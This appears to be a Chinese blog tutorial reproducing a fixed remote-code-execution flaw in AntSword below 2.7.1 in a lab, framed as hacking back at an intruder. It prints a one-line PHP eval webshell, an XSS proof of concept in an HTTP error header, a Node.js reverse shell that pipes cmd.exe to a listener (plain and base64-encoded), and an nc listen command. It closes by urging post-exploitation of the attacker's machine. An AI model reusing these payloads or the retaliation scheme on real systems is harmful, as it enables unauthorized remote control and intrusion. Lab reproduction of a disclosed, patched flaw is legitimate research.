中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
WebShell
WebShell可以理解为网页中的木马程序,通过植入到你的web站点,在web页面上的操作,控制你的计算机操作系统,文件,权限,任意命令执行。
常见的WebShell分为大马、小马、一句话木马、内存马等。
下面为一句话木马的代码展示:
# 一句话木马
<?php @eval($_POST['pass']); ?>
中国蚁剑(AntSword)
当你的计算机被植入了一句话木马后,需要通过工具进行连接,才可以方便管理,而AntSword就是连接一句话木马工具中的其中之一,类似的工具还有:中国菜刀、哥斯拉、冰蝎等。
中国蚁剑(AntSword) RCE漏洞
此漏洞在AntSword2.7.1版本上修复 ,所以适用于AntSword2.7.1以下版本。
此漏洞为AntSword连接WebShell失败时对html代码的解析,导致xss漏洞,而使html代码不在浏览器解析而是在服务器上解析的话需要用到nodejs,所以AntSword使用了nodejs,本文章就讲解利用xss漏洞执行并调用nodejs的库反弹shell拿到权限。
吊打黑客的场景
黑客在你的web服务上植入了WebShell,利用蚁剑去连接并控制了你的电脑,这时被你发现了电脑被控制 变的卡卡的,并且发现了是通过web服务里的WebShell来控制你的,想到自己磁盘里几十G的秘密学习资料可能全部被窃取,你很不爽,你想找到这个黑客小子,绞尽脑汁想了很多办法也无法痛快的还击,直到你想起来以前读到过的我这篇文章,你抱着试试看的态度去尝试了一下,发现成功反向黑掉了那个黑客的电脑,于是你对这个黑客一系列的还击计划开始在脑海里活蹦乱跳...
模拟环境准备:
黑客ip: 192.168.31.124 系统: win7
被攻击的ip:192.168.31.222 系统:win10
黑客电脑软件:
中国蚁剑AntSword2.7.0
中国蚁剑加载器AntSword-Loader2.0.1
被攻击电脑软件
小皮面板Phpstudy
瑞士军刀Netcat
被攻击电脑web部署
安装好phpstudy并运行apache
打开80端口的网站目录 并放入一句话木马WebShell文件
黑客电脑连接WebShell
此时我们作为被攻击的电脑,可以尝试修改WebShell的代码
将一句话木马代码改为如下:
<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) />") ?>
黑客电脑重新连接一句话木马查看效果
发现执行了我们修改的代码中的alert(1) 弹出了提示框,证明是存在xss漏洞的
利用nodejs库编写payload,反弹黑客电脑的shell
使用<=AntSword2.7.0 RCE漏洞,让黑客电脑反弹shell到被攻击电脑的1971端口上
首先开启被攻击电脑的Netcat 监听端口1971
nc -Lp 1971
更改shell.php代码
利用nodejs库反弹shell的代码(payload):
var net = require("net");
var cmd = require("child_process").exec("cmd.exe");
var socket = new net.Socket();
socket.connect(1971, "192.168.31.222", function(){socket.pipe(cmd.stdin);cmd.stdout.pipe(socket);cmd.stderr.pipe(socket);
});
以上代码通过创建Socket来连接192.168.31.222(被攻击的电脑ip) 的1971端口(Netcat监听的端口)
将以上代码进行base64加密,加密后的密文:
dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7
通过javascript的eval函数来调用:
eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())
并替换掉我们前边写的alert(1)代码,最终写到shell.php中的代码如下:
<?php header("HTTP/1.1 500 <img src=1 onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())' />") ?>
黑客电脑尝试重新连接一句话木马,查看效果
黑客使用蚁剑重连,在报错的同时,反弹给了我们一个shell到Netcat监听的1971端口上
利用shell执行命令,查看信息,成功拿下黑客电脑的管理员账号,ip也对应黑客电脑的192.168.31.124
至此,你终于可以对黑客发起反击,进行后渗透...
在该漏洞问题被提出之后,中国蚁剑的作者在及时发布了中国蚁剑的新版本 AntSword v2.7.1+。
中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客相关推荐
- 中国蚁剑AntSword
中国蚁剑AntSword 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. 参考文档 中国蚁剑下载.安装.使用教程_Sumarua的博客-C ...
- 中国蚁剑(antSword)下载、安装、安装出现的问题、使用教程
前言: 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. 通俗的讲:中国蚁剑是 一 款比菜刀还牛的shell控制端软件. 中国蚁剑推崇模块化 ...
- ThinkPHP 多语言模块RCE漏洞复现
1.产品简介 ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架.最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协 ...
- 攻防兼备:中国蚁剑使用指南及特征流量
中国蚁剑是菜刀的升级版本,线现下主流的Webshell连接工具之一,有着较广泛的使用,本篇文章会教给大家蚁剑的使用方法以及不同加密方式的流量特征,兼顾攻防两端. 蚁剑下载安装参考:中国蚁剑(antSw ...
- 我不允许还有人没下载使用中国蚁剑,修改蚁剑特征冲它
目录 一.中国蚁剑下载 二.中国蚁剑安装 第一步:解压后,打开加载器antsword-Loder文件,并运行AntSword.exe程序 第二步:再次打开AntSword.exe,就能再次运行了 三. ...
- 【网络安全】文件上传漏洞及中国蚁剑安装
文件上传漏洞 描述 中国蚁剑安装 1. 官网下载源码和加载器 2.解压至同一目录并 3.安装 4.可能会出现的错误 文件上传过程 必要条件 代码示例 dvwa靶场攻击示例 1.书写一句话密码进行上传 ...
- 【Web安全】中国蚁剑+DVWA(本地文件上传漏洞Upload)
文章目录 1 中国蚁剑 2 文件上传漏洞(Upload) 2.1 准备hack.php 2.2 从DVWA上传hack.php 3 使用蚁剑来连接获得webshell 1 中国蚁剑 中国蚁剑是一款开源 ...
- AntSword 中国蚁剑的下载安装配置(附下载文件)
文章更新于:2020-04-11 按照惯例,需要的文件附上链接放在文首. 文件一: antSword-2.1.8.1.zip.7z 文件大小: 14.3 MB 下载链接: 中国蚁剑 v2.1.8.1 ...
- thinkphp 5.0.23 rce漏洞复现
thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速.兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相 ...
最新文章
- offsetof使用小结
- java8 wordcount_Spark2.x与Java8下WordCount示例
- CVPR 2022 | 模型难复现不一定是作者的错,最新研究发现模型架构要背锅
- ZedGraph5.1.5源码分析去掉鼠标悬浮内容闪烁问题(附源码下载)
- boost::fusion::flatten_view用法的测试程序
- 【转载】Spring @Async 源码解读。
- [转载] Linux启动过程详解-《别怕Linux编程》之八
- iOS 关于集成融云IM的一些常用方法
- SAP Spartacus里unit list tree节点expanded属性的赋值逻辑
- stata主成分分析_主成分分析在STATA中的实现
- mysql双重分组没有值也要显示_mysql 统计数据,按照日期分组,把没有数据的日期也展示出来...
- 用elastic stack来分析下你的redis slowlog
- XUI 熟练使用之(一) ----------- 将 XUI 引入项目
- 参照物中找趋势(大道至简之十七)
- Verilog实现正弦波、三角波、方波、锯齿波的输出
- 知数堂郑松华:MySQL 8.0 SQL优化之CTE 、窗口函数的应用
- 嵌入式GUI盘点-你了解几款?
- 大一第二学期周报4Web基础
- 网页无法在微信内访问怎么办,微信跳转链接的实现方法
- HDU1869:六度分离